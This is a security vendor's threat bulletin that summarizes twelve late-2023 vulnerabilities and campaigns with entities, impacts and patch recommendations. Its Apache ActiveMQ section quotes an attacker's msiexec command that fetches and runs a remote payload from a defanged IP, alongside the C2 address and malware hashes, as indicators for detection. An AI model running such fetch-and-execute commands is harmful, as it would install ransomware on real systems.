Schedule a Demo

BLOG

Threat Bulletin | November 28

In our Threat Bulletins, our highly skilled Security Operations Center (SOC) team has meticulously analyzed and summarized the top threats that have been monitored over the past several weeks. Stay one step ahead of the adversaries as we delve into the ever-evolving landscape of cyber threats, uncover their tactics, and equip you with the knowledge to fortify your defenses against them.

Threat 1: New Security Flaws Discovered in NGINX Ingress Controller for Kubernetes

Sources: 

 

Entities:  

  • NGINX 
  • Kubernetes 
  • ARMO (Kubernetes security platform) 

 

Indicators of Compromise:  

  • CVE-2022-4886 
  • CVE-2023-5043 
  • CVE-2023-5044 

 

Attack Vectors:  

  • Attackers can exploit vulnerabilities in the NGINX Ingress controller for Kubernetes to steal secret credentials from the cluster. These vulnerabilities allow for path sanitization bypass, arbitrary command execution, and code injection. 

 

Impact:  

  • Successful exploitation of these flaws could result in unauthorized access to sensitive data and the injection of arbitrary code into the ingress controller process. 

 

Detailed Description: 

  • The security flaws in the NGINX Ingress controller for Kubernetes can allow attackers to bypass path sanitization, inject arbitrary commands, and execute code.  
  • CVE-2022-4886 specifically results from a lack of validation in a field within the Ingress object, enabling attackers to access Kubernetes API credentials.  
  • CVE-2023-5043 and CVE-2023-5044 vulnerabilities enable an attacker who can control the configuration of the Ingress object to steal secret credentials from the cluster. In default configuration, these secrets include credentials for the Kubernetes API server with very high privileges. 
  • The attacker can either use annotation field “configuration-snippet” (2023-5043) or “permanent-redirect” (2023-5044) to inject arbitrary code into the ingress controller process and get access to everything this process has access to. Among them the service account token of the ingress controller, which has a ClusterRole which enables reading on all Kubernetes secrets of the cluster. 

 

Recommendations: 

  • To mitigate the risks associated with these vulnerabilities, it is recommended to apply the provided mitigations and updates. This includes enabling “strict-validate-path-type” and setting the “–enable-annotation-validation” flag.  
  • Additionally, updating NGINX to version 1.19 and adding the “–enable-annotation-validation” command-line configuration can resolve CVE-2023-5043 and CVE-2023-5044. 
Threat 2: Public Exploit for Critical Cisco IOS XE Vulnerability Released

Sources: 

 

Entities:  

  • Cisco IOS XE 

 

Indicators of Compromise: 

  • CVE-2023-20198 

 

Attack Vectors:

  • Remote code execution through Web Services Management Agent (WSMA) 

 

Impact:

  • Thousands of Cisco IOS XE devices compromised, unauthorized access, reconnaissance 

 

Detailed Description: 

  • CVE-2023-20198 is a critical flaw that allows an attacker to create a full-privilege user on Cisco IOS XE devices.  
  • The exploit takes advantage of weaknesses in the Web Services Management Agent (WSMA) and Nginx-based server configurations.  
  • Cisco has released patches for the most affected versions, with version 17.3 remaining unpatched.  

 

Recommendations:  

Threat 3: Suspected Exploitation of Apache ActiveMQ - CVE-2023-46604

Sources: 

 

Entities:  

  • Rapid7 
  • Apache ActiveM 
  • HelloKitty Ransomware 

 

Attack Vectors:  

  • Remote code execution via Apache ActiveMQ vulnerability 

 

Impact:  

  • Ransomware deployment 
  • Potential data loss 
  • System compromise 

 

Detailed Description: 

  • Rapid7 detected two separate instances of Apache ActiveMQ CVE-2023-46604 exploitation.  
  • The adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations. 
  • CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.” 
  • The ransomware encrypts files and communicates with an HTTP server, 172.245.16.125, through a provided email address, [email protected]. 
  • During a successful exploitation of the vulnerability, Java.exe will contain the specific Apache application being targeted — in this case, D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64, which was observed as the parent process in both incidents.  
  • Post-exploitation, the adversary attempted to load remote binaries named M2.png and M4.png using MSIExec.  

 

Indicators of Compromise: 

  • http://172[.]245[.]16[.]125/m2.png 
  • http://172[.]245[.]16[.]125/m4.png 
  • Files dropped and executed via the msiexec command: 
    • cmd.exe /c “start msiexec /q /i hxxp://172[.]245[.]16[.]125/m4.png” 
    • cmd.exe /c “start msiexec /q /i hxxp://172[.]245[.]16[.]125/m4.png” 
  • The following files hashes were part of the two MSI packages downloaded from the domain 172[.]245[.]16[.]125: 
    • M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4 
    • M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0 
    • dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7 
    • EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C 

 

Affected Products: 

  • According to Apache’s advisory, CVE-2023-46604 affects the following: 
    • Apache ActiveMQ 5.18.0 before 5.18.3 
    • Apache ActiveMQ 5.17.0 before 5.17.6 
    • Apache ActiveMQ 5.16.0 before 5.16.7 
    • Apache ActiveMQ before 5.15.16 
    • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3 
    • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6 
    • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7 
    • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16 

 

Recommendations: 

  • Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue. 

 

SOC Response: 

  • The SOC is building a detection around the known indicators of compromise at this time and will monitor for any updates around this exploit.
Threat 4: Vulnerabilities Found in 34 Windows Drivers Allowing Full Device Takeover

Sources: 

 

Entities:  

  • Vulnerable Windows Driver Model (WDM) 
  • Windows Driver Frameworks (WDF) drivers  

 

Attack Vectors:  

  • Vulnerable Windows drivers 

 

Impact:  

  • Non-privileged threat actors could exploit these drivers to gain control of devices and execute arbitrary code on the underlying systems. This can lead to firmware alteration, privilege escalation, and potentially render systems unbootable. Furthermore, these vulnerabilities can be weaponized for BYOVD (Bring Your Own Vulnerable Driver) attacks. 

 

Detailed Description: 

  • Researchers have identified 34 unique vulnerable Windows drivers in the Windows Driver Model and Windows Driver Frameworks.  
  • Exploiting these drivers could allow threat actors to gain control of devices, execute arbitrary code, and, in some cases, alter firmware or elevate operating system privileges.  
  • The names of some of the vulnerable drivers include AODDriver.sys, ComputerZ.sys, dellbios.sys, GEDevDrv.sys, GtcKmdfBs.sys, IoAccess.sys, kerneld.amd64, ngiodriver.sys, nvoclock.sys, PDFWKRNL.sys (CVE-2023-20598), RadHwMgr.sys, rtif.sys, rtport.sys, stdcdrv64.sys, and TdkLib64.sys (CVE-2023-35841).Additionally, some drivers can bypass security mechanisms like KASLR and can be used for BYOVD attacks, which have been employed by threat actors like the Lazarus Group.  

 

Recommendations:  

  • Ensure that the systems are kept up to date with the latest driver updates and patches. Employ security measures to prevent unauthorized driver installations.  
Threat 5: Critical Vulnerabilities Uncovered in Veeam ONE IT Monitoring Software

Sources: 

 

Entities:  

  • Veeam ONE IT monitoring and analytics platform 

 

Attack Vectors:  

  • Vulnerabilities in Veeam ONE IT monitoring and analytics platform 

 

Impact:  

  • Critical vulnerabilities have been identified in Veeam ONE IT monitoring software, with potential risks ranging from remote code execution on SQL servers to obtaining sensitive account information and cross-site scripting attacks. 

 

Detailed Description: 

  • Veeam ONE IT monitoring software has been found to have four critical vulnerabilities, including flaws that could lead to remote code execution on SQL servers, exposure of sensitive account information, and cross-site scripting attacks.  
  • The list of vulnerabilities is as follows: 
    • CVE-2023-38547 (CVSS score: 9.9) – An unspecified flaw that can be leveraged by an unauthenticated user to gain information about the SQL server connection Veeam ONE uses to access its configuration database, resulting in remote code execution on the SQL server. 
    • CVE-2023-38548 (CVSS score: 9.8) – A flaw in Veeam ONE that allows an unprivileged user with access to the Veeam ONE Web Client to obtain the NTLM hash of the account used by the Veeam ONE Reporting Service. 
    • CVE-2023-38549 (CVSS score: 4.5) – A cross-site scripting (XSS) vulnerability that allows a user with the Veeam ONE Power User role to obtain the access token of a user with the Veeam ONE Administrator role. 
    • CVE-2023-41723 (CVSS score: 4.3) – A vulnerability in Veeam ONE that permits a user with the Veeam ONE Read-Only User role to view the Dashboard Schedule. 
  • These vulnerabilities can have serious implications for organizations using Veeam ONE for their IT monitoring needs.  
  • To mitigate these risks, Veeam has released security updates for affected versions. 

 

Recommendations:  

  • Users of affected Veeam ONE versions are strongly advised to apply the security updates provided by Veeam. Additionally, it is recommended to stop the Veeam ONE Monitoring and Reporting services, replace existing files with the files provided in the hotfix, and then restart the two services.  
Threat 6: CISA Alerts - Active Exploitation of High-Severity SLP Vulnerability

Sources: 

 

Entities:  

  • Service Location Protocol (SLP) 
  • CVE-2023-29552 

 

Attack Vectors:  

  • Denial-of-Service (DoS) vulnerability in SLP protocol 

 

Impact:  

  • A high-severity flaw in the Service Location Protocol (SLP) is actively exploited, posing a risk of significant denial-of-service (DoS) amplification attacks. Tracked as CVE-2023-29552, the vulnerability allows unauthenticated remote attackers to register services and conduct DoS attacks with a substantial amplification factor. 

 

Detailed Description: 

  • CISA has issued an alert regarding the active exploitation of a high-severity flaw in the Service Location Protocol (SLP).  
  • Tracked as CVE-2023-29552, the vulnerability allows unauthenticated remote attackers to register services and launch denial-of-service (DoS) attacks with a considerable amplification factor.  
  • While specific details of the exploitation are unknown, the potential impact on targeted networks and servers is significant. 

 

Recommendations: 

  • Disable the SLP service on systems running on untrusted networks.
Threat 7: Hackers Exploit ScreenConnect Remote Access to Breach Healthcare Organizations

Sources: 

 

Entities:  

  • ScreenConnect 
  • Transaction Data Systems (TDS) 
  • Healthcare Organizations 

 

Attack Vectors:  

  • Compromised ScreenConnect instances 

 

Impact:  

  • Unauthorized access 
  • Installation of malicious payloads 
  • Network reconnaissance 

 

Detailed Description: 

  • Huntress has identified a series of cyberattacks targeting healthcare organizations in the U.S., exploiting vulnerabilities in ScreenConnect instances used by TDS.  
  • The attackers employ similar tactics across multiple incidents, involving the installation of malicious payloads and additional remote access tools for persistent access.  
  • The compromised endpoints, operating on Windows Server 2019, are associated with the pharmaceutical and healthcare sectors.  
  • The ScreenConnect instance is linked to the ‘rs.tdsclinical[.]com’ domain.  
  • The exact breach mechanism, whether through compromised credentials or another method, remains unclear.  

 

Recommendations:  

  • Immediately investigate and secure ScreenConnect instances associated with the ‘rs[.]tdsclinical[.]com’ domain.
Threat 8: Persistent Backdoor 'Effluence' Persists Despite Applying Patches to Atlassian Confluence Servers

Sources: 

 

Entities:  

  • Atlassian Confluence Servers 
  • Effluence Backdoor 

 

Attack Vectors:  

  • Exploitation of critical vulnerabilities (CVE-2023-22515 and CVE-2023-22518) in Atlassian Confluence Servers leading to the deployment of the Effluence backdoor. The vulnerabilities entail:  
    • CVE-2023-22515 – A critical bug in Atlassian that could be abused to create unauthorized Confluence administrator accounts and access Confluence servers. 
    • CVE-2023-22518 – An attacker can also take advantage of to set up a rogue administrator account, resulting in a complete loss of confidentiality, integrity, and availability 

 

Impact:  

  • Deployment of Effluence, a persistent backdoor following the successful exploitation of critical vulnerabilities in Atlassian Confluence Servers.  
    • The backdoor allows remote access without authentication, enabling lateral movement within the network, data exfiltration, and various malicious actions on the compromised server.  

 

Detailed Description: 

  • A persistent backdoor named Effluence is discovered following the exploitation of critical vulnerabilities (CVE-2023-22515 and CVE-2023-22518) in Atlassian Confluence Servers.  
  • Despite patching, Effluence remains active, allowing unauthorized remote access and various malicious activities.  
  • The attack involves embedding a web shell that provides access to every web page on the server.  
  • The adversary gains initial access through CVE-2023-22515, embedding a web shell that grants access to all web pages. 

 

Recommendations: 

  • Organizations using Atlassian Confluence Servers should urgently apply patches for CVE-2023-22515 and CVE-2023-22518 to mitigate the risk of exploitation.  

 

SOC Response: 

  • The SOC is building a detection around known indicators of compromise at this time and will continue to monitor for any updates around this exploit. 
Threat 9: Microsoft Addresses 63 Security Bugs, Including 5 Zero-Day Vulnerabilities

Sources: 

 

Entities:  

  • Microsoft 
    • CVE-2023-36025 
    • CVE-2023-36033 
    • CVE-2023-36036 
    • CVE-2023-36038 
    • CVE-2023-36413 

 

Attack Vectors:  

  • Exploitation of zero-day vulnerabilities 
  • Windows SmartScreen 
  • Elevation of Privilege 
  • Denial of Service 
  • Security Feature Bypass 
  • Information Disclosure 

 

Impact:  

  • Elevation of privilege 
  • Bypassing security features 
  • Potential remote code execution 

 

Detailed Description: 

  • Microsoft’s November updates cover 63 security flaws, including 5 zero-days actively exploited. 
  • The five zero-days that are of note are as follows – 
    • CVE-2023-36025 (CVSS score: 8.8) – Windows SmartScreen Security Feature Bypass Vulnerability 
    • CVE-2023-36033 (CVSS score: 7.8) – Windows DWM Core Library Elevation of Privilege Vulnerability 
    • CVE-2023-36036 (CVSS score: 7.8) – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability 
    • CVE-2023-36038 (CVSS score: 8.2) – ASP.NET Core Denial of Service Vulnerability 
    • CVE-2023-36413 (CVSS score: 6.5) – Microsoft Office Security Feature Bypass Vulnerability 

 

Recommendations:  

  • Apply Microsoft’s November updates promptly. 
Threat 10: CISA Warning - Juniper Devices Facing Active Exploitation

Sources: 

 

Entities:  

  • CISA 
  • Juniper 

 

Attack Vectors:  

  • Remote Code Execution (RCE) via Juniper’s J-Web interface. 

 

Impact:  

  • Significant risks to federal enterprises; Actively exploited vulnerabilities. 

 

Detailed Description: 

  • The vulnerabilities (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847) in Juniper’s J-Web interface are part of a pre-auth exploit chain, allowing remote code execution. 
    • Successful exploitation has been observed in the wild.  
  • Administrators are advised to upgrade JunOS immediately or restrict internet access to the J-Web interface.  
  • CISA emphasizes urgency, adding the vulnerabilities to its Known Exploited Vulnerabilities Catalog. 

 

Recommendations: 

  • Organizations are strongly encouraged to prioritize patching. 
Threat 11: Mirai-based Botnet Exploiting Zero-Day Bugs in Routers and NVRs for Massive DDoS Attacks

Sources: 

  

Entities:  

  • Routers 
  • NVRs 
  • Mirai-based Botnet 
  • Akamai 
  • JenX Mirai 
  • InfectedSlurs 
  • HailBot 
  • wso-ng 
  • AWS 
  • Redis database 
  • Microsoft 

 

Attack Vectors:  

  • Two zero-day vulnerabilities with remote code execution (RCE) functionality targeting routers and network video recorder (NVR) devices. Exploitation of default admin credentials, installation of Mirai variants. 

 

Impact:  

  • Massive, distributed denial-of-service (DDoS) attacks, potential compromise of sensitive data, lateral movement within affected organizations, and persistent threat presence. 

 

Detailed Description: 

  • The malware campaign exploits two zero-day vulnerabilities, targeting routers and NVRs using default admin credentials to install Mirai variants.  
  • The botnet, InfectedSlurs, employs racial and offensive language in its command-and-control servers.  
  • Akamai discovered the campaign in late October 2023, with fixes for one vulnerability expected to be released next month.  
  • The attackers’ identity remains unknown. 

  

Recommendations:  

  1. Apply patches promptly upon release by vendors to mitigate the vulnerabilities. 
  2. Change default admin credentials on routers and NVR devices. 
  3. Implement network segmentation to limit lateral movement. 
Threat 12: CISA Warning - Actively Exploited Vulnerabilities in Windows, Sophos, and Oracle

Sources: 

 

Entities:  

  • U.S. Cybersecurity & Infrastructure Security Agency (CISA) 
  • Microsoft Windows 
  • Sophos Web Appliance 
  • Oracle Fusion Middleware  

 

Indicators of Compromise:  

  • CVE-2023-36584 
  • CVE-2023-1671 
  • CVE-2020-2551 

 

Attack Vectors:  

  • Exploiting applications vulnerable to CVE-2023-36584, CVE-2023-1671 and CVE-2020-2551 

 

Impact:  

  • Remote Code Execution 
  • Compromise of WebLogic Server 
  • Security Feature Bypass 

 

Detailed Description: 

  • CISA has added three actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, emphasizing the need for immediate attention and mitigation. 
  • The three vulnerabilities are: 
    • CVE-2023-36584 – “Mark of the Web” (MotW) security feature bypass on Microsoft Windows. 
    • CVE-2023-1671 – Command injection vulnerability in Sophos Web Appliance allowing remote code execution (RCE). 
    • CVE-2020-2551 – Unspecified vulnerability in Oracle Fusion Middleware, allowing an unauthenticated attacker with network access via IIOP to compromise the WebLogic server. 
  • Microsoft addressed CVE-2023-36584 in the October 2023 Patch Tuesday. 
  • Sophos Web Appliance, affected by CVE-2023-1671, reached end-of-life on July 20, and users are advised to migrate to Sophos Firewall for ongoing security. 

 

Recommendations: 

  • Apply relevant security updates to address the identified vulnerabilities.:
  • Sophos Web Appliance users must migrate to Sophos Firewall for ongoing security support.

950A Union Road, Suite 103
West Seneca, NY 14224
P: 877.729.3527
E: [email protected]

Facebook-f Linkedin Youtube

Channel Futures MSP 501 Winner| MSSP Alert Top 250 MSSP Winner| Inc. Regionals Northeast Winner| Inc. 5000 Winner

© 2024 CyFlare
| All Rights Reserved | Legal | Accessibility

Website Developed by Mason Digital